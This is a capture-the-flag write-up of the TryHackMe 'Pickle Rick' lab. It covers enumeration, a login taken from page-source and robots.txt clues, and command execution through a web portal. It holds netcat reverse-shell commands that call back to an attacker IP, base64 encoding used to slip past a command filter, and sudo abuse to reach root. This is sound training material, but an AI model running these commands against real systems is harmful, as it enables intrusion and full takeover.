Pickle Rick is a TryHackMe CTF requiring you to exploit a web-server in order to find 3 ingredients.
[Task 1] Pickle Rick
What is the first ingredient Rick needs?
Browsing to home page
Lets start out by browsing to the IP, we’ve already been told the box is a web server, it’s probably safe to assume that there might a web site.
Browsing to the site you find an amusing Rick and Morty-based homepage telling you that you need to log in the computer to retrieve 3 ingredients.
On further inspection of the page source, you’ll find comment near the closing </body> tag:
Note to self, remember username!
Username: R1ckRul3sRunning enumeration scripts
NMAP
Nothing particularly interesting here, for now. Just further affirmation that there is a web-server, and there’s an SSH port that’s open. Which, we’ll be exploiting later on I imagine.
kali@kali:~/Desktop/TryHackMe/picklerick$ nmap -sV -sC 10.10.3.141 -oA nmap.txt
Starting Nmap 7.80 ( https://nmap.org ) at 2020-09-13 09:21 EDT
Nmap scan report for target.thm (10.10.3.141)
Host is up (0.021s latency).
Not shown: 998 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.2p2 Ubuntu 4ubuntu2.6 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 35:9f:5b:ab:b1:49:3d:27:a1:b2:5e:e6:68:31:36:f0 (RSA)
| 256 46:c6:60:c2:f9:86:73:e9:b7:b9:d9:b3:0a:ed:9b:89 (ECDSA)
|_ 256 a9:4c:47:2f:0f:fb:15:65:95:22:c2:85:f6:66:a9:2d (ED25519)
80/tcp open http Apache httpd 2.4.18 ((Ubuntu))
|_http-server-header: Apache/2.4.18 (Ubuntu)
|_http-title: Rick is sup4r cool
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel GOBUSTER
Hopefully gobuster can reveal more about the application.
kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -t 100
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://target.thm
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Timeout: 10s
===============================================================
2020/09/13 09:24:29 Starting gobuster
===============================================================
/assets (Status: 301)
/server-status (Status: 403)
===============================================================
2020/09/13 09:25:31 Finished
===============================================================The above GoBuster run was pretty sparce, so I ran another, this time enumerating files with extensions htm,php,txt....
kali@kali:~/Desktop/TryHackMe/picklerick$ gobuster dir --url http://target.thm --wordlist /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt --threads 100 --extensions htm,php,txt,rar,zip,db,cfg,js --expanded --followredirect
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://target.thm
[+] Threads: 100
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: htm,php,txt,rar,zip,db,cfg,js
[+] Follow Redir: true
[+] Expanded: true
[+] Timeout: 10s
===============================================================
2020/09/13 09:28:52 Starting gobuster
===============================================================
http://target.thm/login.php (Status: 200)
http://target.thm/assets (Status: 200)
http://target.thm/portal.php (Status: 200)
http://target.thm/robots.txt (Status: 200)In this case, we found 3 important points:
login.phpportal.phprobots.txt
Digging into enumerated information
Login.php
This a login page, with a post form that sends the following params
usernamepasswordsub=Login
Portal.php
This page redirects to .login.php, likley because we’re not logged in. We may have to bruteforce the login form with hydra.
Robots.txt
A malformed robots file. It contains a singular text line: Wubbalubbadubdub.
Could this be the password for the login page?
Attempting to login with enumerated data
We’ll be testing the following credentials that we’ve pulled so far:
- Username:
R1ckRul3s - Password:
Wubbalubbadubdub?
And fortunately, it works!
Exploiting Portal.php
Now that we’re in the Portal, we dig around.
Command execution form
The first thing we see on portal.php is the “command execution” input box. Lets test this, to see what commands it runs. Preferrably it’ll be some server side command execution; bash, or PHP.
Lets try running ls -lah and see if we can pull a directory listing.
And we can confirm the form does execute bash script, and get the output:
total 40K
drwxr-xr-x 3 root root 4.0K Feb 10 2019 .
drwxr-xr-x 3 root root 4.0K Feb 10 2019 ..
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 Sup3rS3cretPickl3Ingred.txt
drwxrwxr-x 2 ubuntu ubuntu 4.0K Feb 10 2019 assets
-rwxr-xr-x 1 ubuntu ubuntu 54 Feb 10 2019 clue.txt
-rwxr-xr-x 1 ubuntu ubuntu 1.1K Feb 10 2019 denied.php
-rwxrwxrwx 1 ubuntu ubuntu 1.1K Feb 10 2019 index.html
-rwxr-xr-x 1 ubuntu ubuntu 1.5K Feb 10 2019 login.php
-rwxr-xr-x 1 ubuntu ubuntu 2.0K Feb 10 2019 portal.php
-rwxr-xr-x 1 ubuntu ubuntu 17 Feb 10 2019 robots.txtAfter further attempted exploitation, I tried to run:
cat Sup3rS3cretPickl3Ingred.txt; echo; cat clue.txt; echo; whoami; echo; ps -aux; groupsWhich returns Command disabled to make it hard for future PICKLEEEE RICCCKKKK. (¬.¬) ….
Fortunately the command input is only temporarily disabled. And after a little fiddling around find that it’s the cat command that’s disabled. Though, interestingly the error message’s source does contain some type of hashed data?
Vm1wR1UxTnRWa2RUV0d4VFlrZFNjRlV3V2t0alJsWnlWbXQwVkUxV1duaFZNakExVkcxS1NHVkliRmhoTVhCb1ZsWmFWMVpWTVVWaGVqQT0==The whoami command let me know that we’re running as www-data.
The ls /home command shows there are two users with directories there: rick, ubuntu.
Trying to get a reverse netcat shell
I’d tried to figure out what the hell the above hash was, but to no avail, so lets see if we can get a reverse shell on the machine and get a more interactive interface to toy around with.
We’ll need to listen for connections on our attacker machine.
# On the attacker machine
nc -lvp 4444# On the victim machine, run netcat, and on connect, create a shell
nc 10.11.8.219 4444 -e /bin/shThe connection failed, which could be down to the version of netcat. So I ran man netcat via the portal input. Which returned a hint on how to bypass this:
There is no -c or -e option in this netcat, but you still can execute a
command after connection being established by redirecting file descrip-
tors. Be cautious here because opening a port and let anyone connected
execute arbitrary command on your site is DANGEROUS. If you really need
to do this, here is an example:
On 'server' side:
$ rm -f /tmp/f; mkfifo /tmp/f
$ cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/fWe can’t use the cat command for a return; but, it may still execute on the victim box, so lets test it at least.
# Run first, to create the mkfifo
rm -f /tmp/f; mkfifo /tmp/f;
# Run second, for reverse shell
cat /tmp/f | /bin/sh -i 2>&1 | nc 10.11.8.219 4444 > /tmp/f;Unfortunately we failed once again. I’m wondering at this point whether to:
a. Create shell script shell.sh and echo the …Run second… part from above into it, then run that.
b. Create a PHP based shell, upload it to /var/www/html and just execute it.
I’ll go with option A first, then test B.
Shell attempt #1 (shell script)
To save time, I can determine if it’s actally the word cat that’s causing the remote execution to fail.
echo 'cat'; if this fails, then we can skip to option B.
And fortunately-kinda, it fails. So looks like we should try another route.
Shell attempt #2 (php script)
First we need to determine if we can wget files. If we can, we’ll set up a python3 -m http.server on our attacker machine, create a PHP shell, upload it to /var/www/html/... then execute it by browsing to the file.
But, unfortunately, wget doesn’t seem to return any response.
Shell attempt #3 (shell script hacky)
We can’t run the cat command, but, we might be able to echo ca, and then t blah blah blah into a script file that we execute. That way, we avoid inputting and explicit cat into our command.
We don’t have write access in /var/www/html.
On running sudo -l, our current user seems to have some funky permissions too. I’m unsure as to how to exploit this for the time being, but lets dive deeper and find our where we can write a shell to.
Matching Defaults entries for www-data on ip-10-10-3-141.eu-west-1.compute.internal:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User www-data may run the following commands on ip-10-10-3-141.eu-west-1.compute.internal:
(ALL) NOPASSWD: ALLIt really feels like we should have write access in /var/www/html, but lets try somewhere else. The classic /tmp directory is usually spankable.
touch /tmp/x.sh; ls -lah /tmp;
x.shSuccess, we can create a shell script here, now lets try our hacky cat concatenation.
# first we'll print 'ca' to the file, then the rest
printf 'ca' > /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # we can see that bytes are added to the file!
# and the rest...
printf 't /tmp/f | /bin/sh -i 2>&1 | nc -l 10.11.8.219 4444 > /tmp/f;' >> /tmp/x.sh;
ls -lah /tmp/x.sh | grep x.sh; # fingers crossed this'll run!
# then try run the script with sudo
sudo sh /tmp/x.sh;
# if that fails try normal shell exec
sh /tmp/x.sh;This unfortunately failed; but lets test if the shell script actually runs? It may be an error on our behalf.
touch /tmp/y.sh;
printf 'touch /tmp/works.txt; whoami | printf > /tmp/works.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;The script is running as root, so we’re really close. See the works.txt file.
total 40K
drwxrwxrwt 8 root root 4.0K Sep 13 14:33 .
drwxr-xr-x 23 root root 4.0K Sep 13 12:50 ..
drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .ICE-unix
drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .Test-unix
drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .X11-unix
drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .XIM-unix
drwxrwxrwt 2 root root 4.0K Sep 13 12:50 .font-unix
prw-r--r-- 1 www-data www-data 0 Sep 13 14:04 f
drwx------ 3 root root 4.0K Sep 13 12:50 systemd-private-a938bdfc8fce449a9ca1d228a57f00d8-systemd-timesyncd.service-oSRCc2
-rw-r--r-- 1 root root 0 Sep 13 14:33 works.txt
-rw-r--r-- 1 www-data www-data 63 Sep 13 14:30 x.sh
-rw-r--r-- 1 www-data www-data 55 Sep 13 14:33 y.shIt seems like it’s the printf that didn’t work, as there’re no bytes in the file. Lets try echo instead.
touch /tmp/y.sh;
echo 'touch /tmp/works2.txt; whoami | echo > /tmp/works2.txt;' > /tmp/y.sh;
sudo sh /tmp/y.sh;
ls -lah /tmp/;Hmm. As we DO have root. Let’s see if we can steal some SSH files from either rick or ubuntu.
Stealing SSH files instead..
We know we can perform route actions, we just can’t use cat or head .etc … Little bit annoying, but, we do have more options. Lets see if there are some SSH keys we can acquire.
sudo ls -lah /home/rick
And heh, we’ve found the second ingredient file at least…
Though, the aren’t any SSH files for rick.
ls -lah /ubuntu/.ssh has also been wiped. Annoyingly.
Lets get dirty, and create an encoded script
I’m going to encode the previous script with base64, then on the victim machine, decode the text into our shell script…
# on attacker machine
echo 'rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f' | base64;We get the following output… which isn’t quite right.
# base64 script for victim...
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAu
MTEuOC4yMTkgNDQ0NCA+L3RtcC9mCg==Lets chunk it down so we don’t have a funky link break…
echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;
kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'rm /tmp/f;mkfifo /tmp/f;' | base64;
cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==
kali@kali:~/Desktop/TryHackMe/picklerick$ echo 'cat /tmp/f|/bin/sh -i 2>&1|nc 10.11.8.219 4444 >/tmp/f;' | base64;
Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=And run this on victim machine
touch /tmp/a.sh;
echo 'cm0gL3RtcC9mO21rZmlmbyAvdG1wL2Y7Cg==' | base64 -d > /tmp/a.sh;
echo 'Y2F0IC90bXAvZnwvYmluL3NoIC1pIDI+JjF8bmMgMTAuMTEuOC4yMTkgNDQ0NCA+L3RtcC9mOwo=' | base64 -d >> /tmp/a.sh;
sudo sh /tmp/a.sh;We then we get root on our netcat!
kali@kali:~/Desktop/TryHackMe/picklerick$ nc -lvp 4444
listening on [any] 4444 ...
connect to [10.11.8.219] from target.thm [10.10.70.157] 42390
/bin/sh: 0: can't access tty; job control turned off
# whoami
root Now to explore and, finally, cat the files we were looking for.
Exploiting root shell
We can now read the first ingredient that Risk needs
# cat Sup3rS3cretPickl3Ingred.txtWhats the second ingredient Rick needs?
We stumbled on this earlier, it’s tucked away in the /home/rick directory.
# cd /home/rick
# ls
second ingredients
# cat 'second ingredients'Whats the final ingredient Rick needs?
There’s nothing in the /home/rick directory, so lets explore further.
The /home/ubuntu directory seems empty at first, but on running ls -lah, we find there’s a .bash_history file, which, contains a reference to the last ingredient.
cat /home/ubuntu/.bash_historyThat was a good box.